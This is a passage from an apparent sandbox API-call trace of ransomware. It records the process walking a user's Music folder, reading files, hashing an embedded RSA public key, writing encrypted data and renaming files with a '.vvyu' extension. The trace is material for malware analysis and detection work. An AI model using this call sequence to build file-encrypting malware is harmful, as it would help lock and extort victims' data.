hHeap=0x620000) returned 1 [0194.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0194.705] WriteFile (in: hFile=0x568, lpBuffer=0x2ea3a68*, nNumberOfBytesToWrite=0x1ccb, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea3a68*, lpNumberOfBytesWritten=0x312fb14*=0x1ccb, lpOverlapped=0x0) returned 1 [0194.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.705] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x1cd0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.706] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0194.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0194.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0194.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea3a68 [0194.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea3a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0194.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea3e98 [0194.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0194.707] WriteFile (in: hFile=0x568, lpBuffer=0x2ea3e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea3e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0194.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3e98 | out: hHeap=0x620000) returned 1 [0194.707] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0194.707] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0194.707] CloseHandle (hObject=0x568) returned 1 [0194.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0194.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x2ea3a68 [0194.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0194.708] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\OlZ6-jXMW7o1_h PvU.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\olz6-jxmw7o1_h pvu.mp3"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\OlZ6-jXMW7o1_h PvU.mp3.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\olz6-jxmw7o1_h pvu.mp3.vvyu")) returned 1 [0194.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.710] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0194.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0194.712] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0ac0860, ftCreationTime.dwHighDateTime=0x1d8979d, ftLastAccessTime.dwLowDateTime=0x581346b0, ftLastAccessTime.dwHighDateTime=0x1d8a091, ftLastWriteTime.dwLowDateTime=0x581346b0, ftLastWriteTime.dwHighDateTime=0x1d8a091, nFileSizeHigh=0x0, nFileSizeLow=0x4d49, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="p5Fl21.m4a", cAlternateFileName="")) returned 1 [0194.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea10b0 [0194.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5e) returned 0x2cb45f0 [0194.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea10b0 | out: hHeap=0x620000) returned 1 [0194.713] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\p5Fl21.m4a") returned=".m4a" [0194.713] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\p5Fl21.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\p5fl21.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0194.713] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=19785) returned 1 [0194.713] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0194.716] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x4d23, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.716] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0194.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0194.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.719] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.719] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x4d49, lpOverlapped=0x0) returned 1 [0194.722] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0194.722] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.722] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.722] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0194.723] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0194.723] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0194.723] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0194.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0194.723] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0194.724] GetLastError () returned 0x0 [0194.724] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0194.724] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0194.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0194.724] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0194.724] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0194.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0194.724] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0194.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0194.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4d50) returned 0x2ea79b0 [0194.724] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0194.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0194.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0194.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0194.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0194.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0194.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea10b0 [0194.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b58 [0194.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea10f8 [0194.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b70 [0194.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ba0 [0194.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c00 [0194.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2bb8 [0194.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0194.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0194.725] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0194.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea3a68 [0194.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ba0 | out: hHeap=0x620000) returned 1 [0194.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2bb8 | out: hHeap=0x620000) returned 1 [0194.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c00 | out: hHeap=0x620000) returned 1 [0194.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0194.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c00 [0194.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0194.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2bb8 [0194.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0194.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2ba0 [0194.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0194.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99d28 [0194.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0194.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0194.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0194.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0194.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0194.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0194.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0194.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2bb8 | out: hHeap=0x620000) returned 1 [0194.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0194.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ba0 | out: hHeap=0x620000) returned 1 [0194.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0194.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0194.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c00 | out: hHeap=0x620000) returned 1 [0194.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0194.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0194.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0194.729] GetCurrentThreadId () returned 0x66c [0194.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0194.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea0190 [0194.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0194.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0194.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0194.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0194.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0194.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0194.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.729] GetCurrentThreadId () returned 0x66c [0194.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0194.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0194.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0194.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0194.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccace8 [0194.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0194.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0194.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0194.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c00 [0194.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0194.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0194.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0194.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0194.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0194.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0194.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0194.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0194.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ba0 [0194.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0194.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0194.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0194.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0194.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0194.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0194.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0194.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2bb8 [0194.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0194.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0194.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0194.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b88 [0194.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0194.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2c18 [0194.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0194.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0194.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0194.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2be8 [0194.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0194.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2bd0 [0194.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0194.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2c30 [0194.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2bd0 | out: hHeap=0x620000) returned 1 [0194.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2bd0 [0194.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2be8 | out: hHeap=0x620000) returned 1 [0194.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0194.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0194.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0194.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0194.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0194.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ba0 | out: hHeap=0x620000) returned 1 [0194.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ba0 [0194.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0194.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea3a68 [0194.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c00 | out: hHeap=0x620000) returned 1 [0194.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0194.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c30 | out: hHeap=0x620000) returned 1 [0194.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea3c78 [0194.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0194.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99c10 [0194.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0194.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0194.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ba0 | out: hHeap=0x620000) returned 1 [0194.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea3e90 [0194.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0194.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0194.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0194.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0194.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0194.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0194.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0194.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0194.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3c78 | out: hHeap=0x620000) returned 1 [0194.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3e90 | out: hHeap=0x620000) returned 1 [0194.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0194.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0194.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2bd0 | out: hHeap=0x620000) returned 1 [0194.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0194.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c18 | out: hHeap=0x620000) returned 1 [0194.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0194.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2bb8 | out: hHeap=0x620000) returned 1 [0194.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b88 | out: hHeap=0x620000) returned 1 [0194.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0194.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0194.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0194.739] 